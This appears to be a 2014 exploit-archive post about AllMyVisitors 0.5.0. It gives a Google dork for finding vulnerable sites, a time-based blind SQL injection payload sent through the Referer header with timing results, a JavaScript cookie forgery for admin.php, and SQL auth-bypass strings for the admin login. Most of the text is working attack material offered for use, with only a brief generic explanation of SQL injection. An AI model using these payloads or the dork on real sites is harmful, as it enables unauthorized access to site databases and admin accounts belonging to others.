facebook facebook twitter rss

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability

Author: KkK1337 , Published: 05-10-2014
Author: KkK1337

Google Dork : "Copyright (c) 2004 by voice of web"

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user
input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and
doesn't properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it
is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input Referer was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/

Tests performed :

if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"
*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"
*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.577 s

Insecure Cookie Handling :

admin.php

javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

Auth Bypass admin.php :

Username : azerty' or '1=1--# Real admin name

Password : demo1 ' or ' 1=1 or Admin or any thing

Like us on Facebook :